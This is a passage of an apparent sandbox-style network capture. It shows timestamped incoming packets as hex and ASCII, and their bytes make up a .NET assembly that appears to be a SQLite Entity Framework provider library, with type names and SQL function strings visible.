ea 00 00 0a 13 04 03 6f 99 01 00 0a 13 05 04 6f 9a 01 00 0a 6f 9b 01 00 0a 13 06 2b 51 11 06 6f 16 00 00 0a 74 9a 00 00 01 13 07 11 07 6f 9c 01 00 0a 28 Data Ascii: p(p(e,oXi2o(momo&(lomo&,o(q0QsEsBos(rpoo&~ooo+Qoto(
2023-11-18 09:02:35 UTC	428	IN	Data Raw: 6f 7e 01 00 06 2a 9e 03 2d 0b 72 d2 20 00 70 73 5d 01 00 0a 7a 02 03 6f 90 00 00 0a 6f 97 01 00 06 02 03 6f 91 00 00 0a 6f 97 01 00 06 2a 66 03 2d 0b 72 d2 20 00 70 73 5d 01 00 0a 7a 72 e8 20 00 70 73 42 00 00 0a 7a ce 03 2d 0b 72 d2 20 00 70 73 5d 01 00 0a 7a 02 03 6f 94 00 00 0a 6f 99 01 00 06 02 03 6f 95 00 00 0a 6f 97 01 00 06 02 03 6f 94 00 00 0a 6f 98 01 00 06 2a 6e 03 2d 0b 72 d2 20 00 70 73 5d 01 00 0a 7a 02 03 6f 96 00 00 0a 6f 9a 01 00 06 2a 00 13 30 02 00 4b 00 00 00 00 00 00 00 03 2d 0b 72 d2 20 00 70 73 5d 01 00 0a 7a 02 03 6f 97 00 00 0a 6f 9d 01 00 06 02 03 6f 99 00 00 0a 6f 9a 01 00 06 02 03 6f 97 00 00 0a 6f 9b 01 00 06 02 03 6f 9a 00 00 0a 6f 96 01 00 06 02 03 6f 97 00 00 0a 6f 9c 01 00 06 2a 00 13 30 02 00 4b 00 00 00 00 00 00 00 03 2d Data Ascii: o~-r ps]zoooof-r ps]zr psBz-r ps]zoooooon-r ps]zoo0K-r ps]zoooooooooo*0K-
2023-11-18 09:02:35 UTC	429	IN	Data Raw: 0c 00 00 2b 2c 21 72 76 21 00 70 03 6f 3e 00 00 0a 6f 40 00 00 0a 02 7b 4a 00 00 04 28 41 00 00 0a 73 42 00 00 0a 7a 02 7b 45 00 00 04 03 6f 3e 00 00 0a 28 9d 00 00 06 6f 22 00 00 0a 26 2a 62 02 7b 45 00 00 04 03 6f f7 00 00 0a 28 04 00 00 06 6f 22 00 00 0a 26 2a 4a 02 7b 45 00 00 04 72 26 0b 00 70 6f 22 00 00 0a 26 2a 00 1b 30 03 00 49 00 00 00 58 00 00 11 17 0a 03 6f a2 00 00 0a 6f d1 00 00 0a 0b 2b 24 07 6f d2 00 00 0a 06 2c 04 16 0a 2b 11 02 7b 45 00 00 04 72 39 00 00 70 6f 22 00 00 0a 26 02 6f 25 00 00 0a 07 6f 13 00 00 0a 2d d4 de 0a 07 2c 06 07 6f 12 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 0e 00 30 3e 00 0a 00 00 00 00 13 30 02 00 48 00 00 00 00 00 00 00 02 7b 45 00 00 04 72 d3 00 00 70 6f 22 00 00 0a 26 03 6f 90 00 00 0a 02 6f 25 00 00 0a 02 7b Data Ascii: +,!rv!po>o@{J(AsBz{Eo>(o"&b{Eo(o"&J{Er&po"&0IXoo+$o,+{Er9po"&o%o-,o0>0H{Erpo"&oo%{
2023-11-18 09:02:35 UTC	430	IN	Data Raw: 2a 03 74 56 00 00 01 0b 04 74 56 00 00 01 0c 07 6f f7 00 00 0a 08 6f f7 00 00 0a 33 13 02 07 6f a5 00 00 0a 08 6f a5 00 00 0a 28 c9 01 00 06 2a 16 2a 16 2a 00 00 00 13 30 02 00 75 00 00 00 3d 00 00 11 03 6f bc 00 00 0a 0a 06 1f 2b 30 0b 06 1a 2e 13 06 1f 2b 2e 20 2b 57 06 1f 2e 2e 30 06 1f 38 2e 3c 2b 4b 02 03 74 2b 00 00 01 6f b8 00 00 0a 28 ca 01 00 06 2a 03 74 3e 00 00 01 6f f3 00 00 0a 6f cf 01 00 0a 20 ff ff ff 7f 61 2a 03 74 56 00 00 01 6f f7 00 00 0a 6f cf 01 00 0a 2a 03 74 49 00 00 01 6f fa 00 00 0a 6f cf 01 00 0a 2a 03 6f cf 01 00 0a 2a 2e 73 c8 01 00 06 80 58 00 00 04 2a 2e 73 cd 01 00 06 80 59 00 00 04 2a 3a 03 6f bc 00 00 0a 1f 18 fe 01 16 fe 01 2a 2e 03 6f bc 00 00 0a 1f 18 fe 01 2a 13 30 04 00 39 00 00 00 0f 00 00 11 03 16 52 02 6f 72 00 00 Data Ascii: tVtVoo3oo(*0u=o+0.+. +W..08.<+Kt+o(t>oo atVootIooo.sX.sY:o.o09Ror
2023-11-18 09:02:35 UTC	432	IN	Data Raw: cc 18 06 00 b7 15 cc 18 16 00 7b 00 f1 02 0a 00 cf 04 ed 28 0a 00 c6 05 ed 28 0e 00 09 0b d8 02 0a 00 16 06 ed 28 0a 00 40 06 ed 28 06 00 0b 16 cc 18 06 00 1b 04 cc 18 0a 00 09 0f ed 28 0a 00 7b 0c 83 18 12 00 66 2c 6f 0f 0a 00 d3 0b 83 18 06 00 74 01 cc 18 93 00 e6 1f 00 00 03 02 44 27 00 00 06 00 10 26 59 02 06 00 90 11 cc 18 0e 00 e7 36 ed 22 06 00 f1 23 cc 18 0e 00 20 04 ed 22 0e 00 12 24 ed 22 0e 00 f4 1f ed 22 0e 00 4d 24 ed 22 0e 00 49 26 ed 22 0a 00 04 33 00 23 06 00 4d 04 cc 18 1a 00 e7 23 13 17 16 00 99 01 f1 02 06 00 62 00 cc 18 0a 00 5b 28 00 23 12 00 0f 2b 6f 0f 12 00 12 20 6f 0f 0e 00 4b 07 d8 02 12 00 38 04 6f 0f 0a 00 d3 21 00 23 0a 00 f1 32 00 23 0a 00 e1 25 83 18 12 00 38 24 6f 0f 12 00 8f 2a 6f 0f 0e 00 20 1a d8 02 12 00 69 26 6f 0f 16 Data Ascii: {(((@(({f,otD'&Y6"# "$""M$"I&"3#M#b[(#+o oK8o!#2#%8$o*o i&o
2023-11-18 09:02:35 UTC	433	IN	Data Raw: 06 01 00 9a 0c 76 0e 06 00 6e 05 7b 0e 06 00 24 1a 7b 0e 01 00 bb 2a 7f 0e 01 00 80 32 1c 0e 01 00 26 29 19 0e 36 00 57 05 8d 0e 01 00 98 03 19 0e 03 00 c8 2d 91 0e 03 00 5a 04 96 0e 03 00 81 14 26 06 03 00 14 04 19 0e 33 00 57 05 9b 0e 11 00 4f 19 9f 0e 11 00 3b 0d a4 0e 33 01 d4 01 a9 0e 21 00 3b 35 ae 0e 21 00 53 06 b2 0e 21 00 48 2c b7 0e 21 00 70 2a bf 0e 01 00 48 32 c4 0c 01 00 ef 04 26 06 01 00 4b 0f c4 0c 01 00 f4 31 e9 0c 01 00 27 03 c4 0c 06 00 aa 2a 2d 02 01 00 23 36 37 02 06 00 1e 36 37 02 01 00 38 01 d8 0c 01 00 4b 0f c4 0c 01 00 f4 31 e9 0c 01 00 27 03 c4 0c 06 00 aa 2a 2d 02 01 00 38 01 0d 0d 01 00 b3 01 15 0d 33 00 30 23 ca 0e 36 00 2a 02 ce 0e 16 00 01 00 d2 0e 16 00 3c 00 d2 0e 50 20 00 00 00 00 93 00 a9 17 dd 0e 01 00 98 21 00 00 00 00 Data Ascii: vn{${2&)6W-Z&3WO;3!;5!S!H,!pH2&K1'-#67678K1'-830#6*<P !
2023-11-18 09:02:35 UTC	434	IN	Data Raw: 64 30 00 00 00 00 c6 00 20 2f cc 10 62 00 67 30 00 00 00 00 c6 00 20 2f d3 10 63 00 5b 30 00 00 00 00 c6 00 20 2f da 10 64 00 5b 30 00 00 00 00 c6 00 20 2f e1 10 65 00 5b 30 00 00 00 00 c6 00 20 2f e8 10 66 00 5b 30 00 00 00 00 c6 00 20 2f ef 10 67 00 78 30 00 00 00 00 c6 00 20 2f f6 10 68 00 a0 30 00 00 00 00 c6 00 20 2f fd 10 69 00 b4 30 00 00 00 00 c6 00 20 2f 04 11 6a 00 dc 30 00 00 00 00 c6 00 20 2f 0b 11 6b 00 ec 30 00 00 00 00 c6 00 20 2f 12 11 6c 00 28 31 00 00 00 00 c6 00 20 2f 19 11 6d 00 5b 30 00 00 00 00 c6 00 20 2f 20 11 6e 00 5b 30 00 00 00 00 c6 00 20 2f 27 11 6f 00 5b 30 00 00 00 00 c6 00 20 2f 2e 11 70 00 50 31 00 00 00 00 c6 00 20 2f 35 11 71 00 88 31 00 00 00 00 c6 00 20 2f 3c 11 72 00 bf 31 00 00 00 00 c6 00 20 2f 43 11 73 00 cd 31 00 Data Ascii: d0 /bg0 /c[0 /d[0 /e[0 /f[0 /gx0 /h0 /i0 /j0 /k0 /l(1 /m[0 / n[0 /'o[0 /.pP1 /5q1 /<r1 /Cs1
2023-11-18 09:02:35 UTC	436	IN	Data Raw: 13 c2 00 ba 43 00 00 00 00 c6 00 20 2f bc 13 c3 00 ba 43 00 00 00 00 c6 00 20 2f c4 13 c4 00 20 4f 00 00 00 00 c6 00 20 2f cc 13 c5 00 f4 4f 00 00 00 00 c6 00 20 2f d4 13 c6 00 ba 43 00 00 00 00 c6 00 20 2f dc 13 c7 00 ae 50 00 00 00 00 c6 00 20 2f e4 13 c8 00 c8 50 00 00 00 00 c6 00 20 2f ec 13 c9 00 24 51 00 00 00 00 81 00 1d 0f f4 13 ca 00 8c 51 00 00 00 00 81 00 a6 1e fd 13 cc 00 14 52 00 00 00 00 81 00 e8 1d 09 14 cf 00 b8 52 00 00 00 00 81 00 d0 1e 18 14 d3 00 08 53 00 00 00 00 81 00 99 27 74 13 d5 00 68 54 00 00 00 00 81 00 ba 1b 21 14 d6 00 ac 54 00 00 00 00 81 00 19 1c 2a 14 d8 00 40 56 00 00 00 00 81 00 8e 2f 3e 14 dc 00 1c 58 00 00 00 00 81 00 ab 1a 74 13 e0 00 e4 58 00 00 00 00 81 00 7c 1c 4a 14 e1 00 6d 59 00 00 00 00 81 00 64 21 0b 11 e4 00 Data Ascii: C /C / O /O /C /P /P /$QQRRS'thT!T*@V/>XtX\|JmYd!
2023-11-18 09:02:35 UTC	437	IN	Data Raw: 82 0f 10 00 58 01 26 76 00 00 00 00 c6 00 3b 0a 06 00 59 01 38 76 00 00 00 00 93 00 79 33 9a 15 59 01 c8 76 00 00 00 00 93 00 59 35 ad 15 5c 01 f9 76 00 00 00 00 93 00 ce 2f b3 15 5e 01 07 77 00 00 00 00 93 00 a3 24 ba 15 60 01 18 77 00 00 00 00 93 00 57 0a c4 15 63 01 45 77 00 00 00 00 91 00 68 14 cc 15 65 01 65 77 00 00 00 00 93 00 21 05 ba 04 66 01 70 77 00 00 00 00 93 00 21 05 d3 15 67 01 a4 77 00 00 00 00 93 00 21 05 d9 15 69 01 df 77 00 00 00 00 93 00 f5 13 e0 15 6c 01 0a 78 00 00 00 00 93 00 fc 13 e0 15 6d 01 1c 78 00 00 00 00 93 00 fc 13 e7 15 6e 01 30 78 00 00 00 00 93 00 a1 03 e0 15 70 01 42 78 00 00 00 00 93 00 a1 03 e7 15 71 01 56 78 00 00 00 00 93 00 13 14 f0 15 73 01 6b 78 00 00 00 00 93 00 13 14 f9 15 76 01 7b 78 00 00 00 00 93 00 13 14 03 Data Ascii: X&v;Y8vy3YvY5\v/^w$`wWcEwheew!fpw!gw!iwlxmxn0xpBxqVxskxv{x
2023-11-18 09:02:35 UTC	438	IN	Data Raw: 00 c6 00 20 2f 75 17 ca 01 d0 90 00 00 00 00 c6 00 20 2f 7c 17 cb 01 c4 90 00 00 00 00 c6 00 20 2f 83 17 cc 01 c4 90 00 00 00 00 c6 00 20 2f 8a 17 cd 01 c4 90 00 00 00 00 c6 00 20 2f 91 17 ce 01 c4 90 00 00 00 00 c6 00 20 2f 98 17 cf 01 68 91 00 00 00 00 c6 00 20 2f 9f 17 d0 01 71 91 00 00 00 00 c4 01 53 36 a6 17 d1 01 99 91 00 00 00 00 c6 00 20 2f ad 17 d2 01 b3 91 00 00 00 00 c6 00 20 2f b4 17 d3 01 e7 91 00 00 00 00 c6 00 20 2f bb 17 d4 01 04 92 00 00 00 00 c6 00 20 2f c2 17 d5 01 68 91 00 00 00 00 c6 00 20 2f c9 17 d6 01 c4 90 00 00 00 00 c6 00 20 2f d0 17 d7 01 c4 90 00 00 00 00 c6 00 20 2f d7 17 d8 01 5c 92 00 00 00 00 c6 00 20 2f de 17 d9 01 b3 92 00 00 00 00 c6 00 20 2f e5 17 da 01 e7 92 00 00 00 00 c6 00 20 2f ec 17 db 01 c4 90 00 00 00 00 c6 00 Data Ascii: /u /\| / / / /h /qS6 / / / /h / / /\ / / /
2023-11-18 09:02:35 UTC	440	IN	Data Raw: 02 00 02 00 49 2c 00 00 01 00 e0 23 00 00 01 00 b9 07 02 00 02 00 78 2b 02 00 03 00 cf 23 00 00 01 00 c4 26 00 00 02 00 78 2b 02 00 03 00 be 23 00 00 01 00 3c 35 00 00 02 00 60 06 00 00 03 00 c4 26 00 00 04 00 d5 13 00 00 05 00 ca 32 00 00 01 00 db 24 00 00 01 00 db 24 00 00 01 00 32 26 00 00 02 00 5f 27 00 00 01 00 95 12 00 00 01 00 95 12 00 00 01 00 95 12 00 00 01 00 13 0a 00 00 02 00 9a 0c 00 00 03 00 31 2d 00 00 01 00 99 25 00 00 01 00 23 36 00 00 02 00 95 12 00 00 01 00 23 36 00 00 02 00 7e 2a 00 00 01 00 23 36 00 00 01 00 23 36 00 00 01 00 23 36 00 00 01 00 23 36 00 00 01 00 db 24 00 00 01 00 23 36 02 00 02 00 6f 1f 00 00 01 00 f9 06 00 00 01 00 9a 0c 00 00 01 00 f9 06 00 00 01 00 0f 0c 00 00 01 00 f9 06 00 00 01 00 9a 0c 00 00 01 00 9a 0c 00 00 01 Data Ascii: I,#x+#&x+#<5`&2$$2&_'1-%#6#6~*#6#6#6#6$#6o
2023-11-18 09:02:36 UTC	441	IN	Data Raw: 7d 2d 00 00 02 00 b3 04 00 00 03 00 32 14 00 00 04 00 bf 21 00 00 01 00 e8 30 00 00 02 00 a5 2f 00 00 03 00 10 35 00 00 04 00 b0 32 00 00 01 00 d9 12 00 00 01 00 e4 2e 00 00 02 00 10 2f 00 00 03 00 cf 26 00 00 01 00 d9 12 00 00 01 00 d9 12 00 00 01 00 d9 12 00 00 01 00 d9 12 00 00 02 00 d8 08 00 00 01 00 d9 12 00 00 02 00 a5 2f 00 00 01 00 d9 12 00 00 01 00 d9 12 00 00 01 00 05 2c 00 00 02 00 d9 12 00 00 01 00 d9 12 00 00 02 00 ac 2c 00 00 01 00 65 19 00 00 02 00 d9 12 00 00 01 00 65 19 00 00 02 00 d9 12 00 00 01 00 65 19 00 00 02 00 d9 12 00 00 01 00 65 19 00 00 02 00 d9 12 00 00 01 00 65 19 00 00 02 00 d9 12 00 00 01 00 65 19 00 00 02 00 d9 12 00 00 01 00 65 19 00 00 02 00 d9 12 00 00 01 00 65 19 00 00 02 00 d9 12 00 00 01 00 65 19 00 00 02 00 d9 12 00 Data Ascii: }-2!0/52./&/,,eeeeeeeee
2023-11-18 09:02:36 UTC	442	IN	Data Raw: 32 00 00 01 00 95 12 00 00 01 00 a9 2d 00 00 01 00 3c 35 00 00 02 00 54 06 00 00 03 00 5b 2a 00 00 04 00 f0 04 00 00 01 00 95 12 00 00 02 00 9a 0c 00 00 01 00 95 12 00 00 02 00 fe 0a 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 01 00 0f 1f 00 00 Data Ascii: 2-<5T[*
2023-11-18 09:02:36 UTC	444	IN	Data Raw: cb 02 49 03 60 29 dd 02 dc 00 36 12 ef 02 51 03 e7 11 39 00 31 05 de 2d f8 02 61 05 8c 27 10 00 31 01 78 2c 04 03 e4 00 36 12 ef 02 59 03 e7 11 39 00 59 03 7a 03 29 00 f1 03 49 2b 16 03 61 03 f3 2f 29 00 ec 00 41 27 45 00 f4 00 e8 31 34 00 61 03 11 09 c7 00 31 05 33 37 42 03 fc 00 41 27 45 00 31 05 b4 2a 5f 03 31 03 34 08 c7 00 f9 04 4b 0d 6c 03 19 05 78 14 72 03 81 05 82 0f 10 00 04 01 8c 27 06 00 04 01 57 03 d2 01 04 01 3e 32 e8 00 04 01 41 27 b8 01 0c 01 e8 31 34 00 81 05 82 0f 93 03 61 05 8c 27 06 00 0c 01 16 35 29 00 1c 00 8c 27 06 00 49 01 9e 2c 98 03 51 01 75 19 98 03 51 01 6c 19 98 03 51 01 18 0e 90 00 61 01 72 2d a8 03 99 01 bf 2e 90 00 99 01 e9 2e 90 00 91 00 45 0c b7 03 e9 02 8b 08 c7 00 a1 01 06 35 9c 00 a1 01 ae 0e 90 00 a9 01 9e 2c 98 03 b1 Data Ascii: I`)6Q91-a'1x,6Y9Yz)I+a/)A'E14a137BA'E1*_14Klxr'W>2A'14a'5)'I,QuQlQar-..E5,
2023-11-18 09:02:36 UTC	445	IN	Data Raw: 00 59 04 8c 27 6e 09 31 06 f1 11 73 06 91 04 52 14 75 09 39 06 a7 29 8b 09 91 04 db 35 93 09 39 06 3c 0e a0 09 91 04 fd 18 a0 09 a1 05 5b 19 ba 04 41 06 8c 27 10 00 31 05 bd 2f c7 00 59 04 99 0b bf 09 44 02 36 12 6d 01 49 06 8c 27 10 00 31 01 b8 06 d5 09 31 01 a1 06 de 09 31 01 a1 06 e9 09 31 01 73 06 f9 09 31 01 8b 06 08 0a 31 01 8b 06 14 0a 31 01 e3 06 1f 0a 31 01 e3 06 2a 0a 59 04 5f 0b bf 09 44 02 a8 18 3b 02 e4 00 a8 18 b4 04 51 06 34 36 57 0a 51 06 5e 18 5d 0a 69 04 dd 0e 64 0a 81 04 e7 21 73 0a 31 04 2b 35 10 00 31 04 05 0b b6 0a a9 03 39 2c bd 0a 54 02 41 27 45 00 5c 02 e8 31 34 00 69 02 39 2c eb 0a 64 02 d3 35 34 00 6c 02 36 12 ef 02 b9 04 2b 08 c7 00 b9 04 65 06 10 01 b9 04 90 05 07 0b 61 06 8f 12 0d 0b 64 02 e7 11 12 0b a1 04 39 2c 17 0b 69 06 Data Ascii: Y'n1sRu9)59<[A'1/YD6mI'1111s1111*Y_D;Q46WQ^]id!s1+519,TA'E\14i9,d54l6+ead9,i
2023-11-18 09:02:36 UTC	446	IN	Data Raw: 00 00 e3 19 46 19 00 00 b4 29 85 19 00 00 89 29 85 19 00 00 50 2e 46 19 00 00 f5 2c 32 19 00 00 c6 2c 32 19 00 00 17 2d 8f 19 00 00 8a 23 9a 19 00 00 70 23 9f 19 00 00 22 2e a4 19 00 00 f3 18 a4 19 00 00 f3 0c a4 19 00 00 6f 35 a4 19 00 00 83 35 a4 19 00 00 99 34 46 19 00 00 11 30 a9 19 00 00 ff 2a 3b 19 00 00 91 13 46 19 00 00 67 33 46 19 00 00 0e 0a ad 19 00 00 d5 09 ad 19 00 00 95 0c b1 19 00 00 1d 29 46 19 00 00 77 32 73 19 00 00 f5 24 b7 19 00 00 6b 0d bd 19 00 00 67 02 c3 19 00 00 81 02 c3 19 00 00 3d 2c c7 19 00 00 63 2a d0 19 00 00 30 31 dc 19 00 00 67 31 e1 19 00 00 30 31 dc 19 00 00 67 31 e1 19 02 00 0f 00 03 00 01 00 10 00 03 00 02 00 11 00 05 00 02 00 12 00 07 00 01 00 13 00 07 00 02 00 14 00 09 00 02 00 15 00 0b 00 01 00 16 00 0b 00 02 00 21 Data Ascii: F))P.F,2,2-#p#".o554F0;Fg3F)Fw2s$kg=,c01g101g1!
2023-11-18 09:02:36 UTC	448	IN	Data Raw: 00 3c 54 72 79 54 72 61 6e 73 6c 61 74 65 49 6e 74 6f 49 6e 3e 62 5f 5f 33 31 5f 31 00 4e 75 6c 6c 61 62 6c 65 60 31 00 49 45 6e 75 6d 65 72 61 62 6c 65 60 31 00 53 74 61 63 6b 60 31 00 49 43 6f 6c 6c 65 63 74 69 6f 6e 60 31 00 52 65 61 64 4f 6e 6c 79 4d 65 74 61 64 61 74 61 43 6f 6c 6c 65 63 74 69 6f 6e 60 31 00 52 65 61 64 4f 6e 6c 79 43 6f 6c 6c 65 63 74 69 6f 6e 60 31 00 4c 69 73 74 45 6c 65 6d 65 6e 74 48 61 6e 64 6c 65 72 60 31 00 49 43 6f 6d 70 61 72 65 72 60 31 00 49 45 71 75 61 6c 69 74 79 43 6f 6d 70 61 72 65 72 60 31 00 54 6f 53 74 72 69 6e 67 43 6f 6e 76 65 72 74 65 72 60 31 00 49 45 6e 75 6d 65 72 61 74 6f 72 60 31 00 44 62 45 78 70 72 65 73 73 69 6f 6e 56 69 73 69 74 6f 72 60 31 00 49 4c 69 73 74 60 31 00 3c 3e 37 5f 5f 77 72 61 70 31 00 3c Data Ascii: <TryTranslateIntoIn>b__31_1Nullable`1IEnumerable`1Stack`1ICollection`1ReadOnlyMetadataCollection`1ReadOnlyCollection`1ListElementHandler`1IComparer`1IEqualityComparer`1ToStringConverter`1IEnumerator`1DbExpressionVisitor`1IList`1<>7__wrap1<
2023-11-18 09:02:36 UTC	449	IN	Data Raw: 65 74 65 72 4d 6f 64 65 00 54 72 79 47 65 74 49 73 55 6e 69 63 6f 64 65 00 69 73 55 6e 69 63 6f 64 65 00 6d 6f 64 65 00 44 62 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 55 70 64 61 74 65 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 44 65 6c 65 74 65 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 4d 6f 64 69 66 69 63 61 74 69 6f 6e 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 46 75 6e 63 74 69 6f 6e 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 49 6e 73 65 72 74 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 51 75 65 72 79 43 6f 6d 6d 61 6e 64 54 72 65 65 00 5f 63 6f 6d 6d 61 6e 64 54 72 65 65 00 74 72 65 65 00 67 65 74 5f 54 79 70 65 55 73 61 67 65 00 43 72 65 61 74 65 44 61 74 65 54 69 6d 65 54 79 70 65 55 73 61 67 65 00 43 72 65 61 74 65 53 74 72 69 6e 67 54 79 70 65 55 73 Data Ascii: eterModeTryGetIsUnicodeisUnicodemodeDbCommandTreeDbUpdateCommandTreeDbDeleteCommandTreeDbModificationCommandTreeDbFunctionCommandTreeDbInsertCommandTreeDbQueryCommandTree_commandTreetreeget_TypeUsageCreateDateTimeTypeUsageCreateStringTypeUs
2023-11-18 09:02:36 UTC	450	IN	Data Raw: 44 62 54 79 70 65 00 64 62 54 79 70 65 00 73 65 74 5f 43 6f 6d 6d 61 6e 64 54 79 70 65 00 63 6f 6d 6d 61 6e 64 54 79 70 65 00 73 65 72 76 69 63 65 54 79 70 65 00 67 65 74 5f 56 61 72 69 61 62 6c 65 54 79 70 65 00 47 65 74 53 74 6f 72 65 54 79 70 65 00 73 74 6f 72 65 54 79 70 65 00 56 61 6c 75 65 54 79 70 65 00 67 65 74 5f 53 74 6f 72 65 54 79 70 65 4e 61 6d 65 54 6f 53 74 6f 72 65 50 72 69 6d 69 74 69 76 65 54 79 70 65 00 47 65 74 53 71 6c 50 72 69 6d 69 74 69 76 65 54 79 70 65 00 67 65 74 5f 53 74 6f 72 65 54 79 70 65 4e 61 6d 65 54 6f 45 64 6d 50 72 69 6d 69 74 69 76 65 54 79 70 65 00 47 65 74 45 64 6d 50 72 69 6d 69 74 69 76 65 54 79 70 65 00 49 73 50 72 69 6d 69 74 69 76 65 54 79 70 65 00 70 72 69 6d 69 74 69 76 65 54 79 70 65 00 54 45 64 6d 54 79 70 Data Ascii: DbTypedbTypeset_CommandTypecommandTypeserviceTypeget_VariableTypeGetStoreTypestoreTypeValueTypeget_StoreTypeNameToStorePrimitiveTypeGetSqlPrimitiveTypeget_StoreTypeNameToEdmPrimitiveTypeGetEdmPrimitiveTypeIsPrimitiveTypeprimitiveTypeTEdmTyp
2023-11-18 09:02:36 UTC	454	IN	Data Raw: 73 69 6f 6e 00 44 62 55 6e 69 6f 6e 41 6c 6c 45 78 70 72 65 73 73 69 6f 6e 00 44 62 4e 75 6c 6c 45 78 70 72 65 73 73 69 6f 6e 00 44 62 49 73 4e 75 6c 6c 45 78 70 72 65 73 73 69 6f 6e 00 56 69 73 69 74 49 73 4e 75 6c 6c 45 78 70 72 65 73 73 69 6f 6e 00 44 62 53 63 61 6e 45 78 70 72 65 73 73 69 6f 6e 00 44 62 4a 6f 69 6e 45 78 70 72 65 73 73 69 6f 6e 00 49 73 4a 6f 69 6e 45 78 70 72 65 73 73 69 6f 6e 00 44 62 43 72 6f 73 73 4a 6f 69 6e 45 78 70 72 65 73 73 69 6f 6e 00 56 69 73 69 74 4a 6f 69 6e 45 78 70 72 65 73 73 69 6f 6e 00 44 62 52 65 6c 61 74 69 6f 6e 73 68 69 70 4e 61 76 69 67 61 74 69 6f 6e 45 78 70 72 65 73 73 69 6f 6e 00 44 62 46 75 6e 63 74 69 6f 6e 45 78 70 72 65 73 73 69 6f 6e 00 44 62 43 6f 6d 70 61 72 69 73 6f 6e 45 78 70 72 65 73 73 69 6f 6e Data Ascii: sionDbUnionAllExpressionDbNullExpressionDbIsNullExpressionVisitIsNullExpressionDbScanExpressionDbJoinExpressionIsJoinExpressionDbCrossJoinExpressionVisitJoinExpressionDbRelationshipNavigationExpressionDbFunctionExpressionDbComparisonExpression
2023-11-18 09:02:36 UTC	459	IN	Data Raw: 65 72 73 00 68 61 6e 64 6c 65 72 73 00 4d 65 74 61 64 61 74 61 48 65 6c 70 65 72 73 00 52 75 6e 74 69 6d 65 48 65 6c 70 65 72 73 00 54 79 70 65 48 65 6c 70 65 72 73 00 67 65 74 5f 50 61 72 61 6d 65 74 65 72 73 00 5f 70 61 72 61 6d 65 74 65 72 73 00 67 65 74 5f 4b 65 79 56 61 6c 75 65 50 61 69 72 73 00 53 51 4c 69 74 65 44 61 74 65 46 6f 72 6d 61 74 73 00 67 65 74 5f 46 61 63 65 74 73 00 68 65 78 44 69 67 69 74 73 00 67 65 74 5f 73 71 6c 46 72 61 67 6d 65 6e 74 73 00 67 65 74 5f 41 72 67 75 6d 65 6e 74 73 00 70 61 72 65 6e 74 68 65 73 69 73 65 41 72 67 75 6d 65 6e 74 73 00 67 65 74 5f 46 72 6f 6d 45 78 74 65 6e 74 73 00 66 72 6f 6d 45 78 74 65 6e 74 73 00 67 65 74 5f 41 6c 6c 4a 6f 69 6e 45 78 74 65 6e 74 73 00 73 65 74 5f 41 6c 6c 4a 6f 69 6e 45 78 74 65 Data Ascii: ershandlersMetadataHelpersRuntimeHelpersTypeHelpersget_Parameters_parametersget_KeyValuePairsSQLiteDateFormatsget_FacetshexDigitsget_sqlFragmentsget_ArgumentsparenthesiseArgumentsget_FromExtentsfromExtentsget_AllJoinExtentsset_AllJoinExte
2023-11-18 09:02:36 UTC	463	IN	Data Raw: 00 73 00 73 00 69 00 6f 00 6e 00 00 0d 43 00 4f 00 4e 00 43 00 41 00 54 00 00 11 44 00 41 00 54 00 45 00 50 00 41 00 52 00 54 00 00 11 44 00 61 00 74 00 65 00 50 00 61 00 72 00 74 00 00 0f 47 00 45 00 54 00 44 00 41 00 54 00 45 00 00 15 47 00 45 00 54 00 55 00 54 00 43 00 44 00 41 00 54 00 45 00 00 0f 49 00 6e 00 64 00 65 00 78 00 4f 00 66 00 00 0d 4c 00 65 00 6e 00 67 00 74 00 68 00 00 0f 4e 00 65 00 77 00 47 00 75 00 69 00 64 00 00 0b 52 00 6f 00 75 00 6e 00 64 00 00 0f 54 00 6f 00 4c 00 6f 00 77 00 65 00 72 00 00 0f 54 00 6f 00 55 00 70 00 70 00 65 00 72 00 00 09 54 00 72 00 69 00 6d 00 00 09 4c 00 65 00 66 00 74 00 00 0b 52 00 69 00 67 00 68 00 74 00 00 13 53 00 75 00 62 00 73 00 74 00 72 00 69 00 6e 00 67 00 00 1f 43 00 75 00 72 00 72 00 65 00 6e 00 Data Ascii: ssionCONCATDATEPARTDatePartGETDATEGETUTCDATEIndexOfLengthNewGuidRoundToLowerToUpperTrimLeftRightSubstringCurren
2023-11-18 09:02:36 UTC	467	IN	Data Raw: 72 00 20 00 53 00 54 00 52 00 46 00 54 00 49 00 4d 00 45 00 20 00 61 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 01 13 43 00 48 00 41 00 52 00 49 00 4e 00 44 00 45 00 58 00 00 1d 52 00 41 00 4e 00 44 00 4f 00 4d 00 42 00 4c 00 4f 00 42 00 28 00 31 00 36 00 29 00 00 0f 4c 00 45 00 4e 00 47 00 54 00 48 00 28 00 00 0d 52 00 4f 00 55 00 4e 00 44 00 28 00 00 09 2c 00 20 00 30 00 29 00 00 0b 54 00 52 00 49 00 4d 00 28 00 00 0f 53 00 55 00 42 00 53 00 54 00 52 00 28 00 00 0b 2c 00 20 00 31 00 2c 00 20 00 00 09 2c 00 20 00 2d 00 28 00 01 07 29 00 2c 00 20 00 00 0b 4c 00 4f 00 57 00 45 00 52 00 00 0b 55 00 50 00 50 00 45 00 52 00 00 13 20 00 43 00 4f 00 4c 00 4c 00 41 00 54 00 45 00 20 00 00 0b 20 00 44 00 45 00 53 00 43 00 00 09 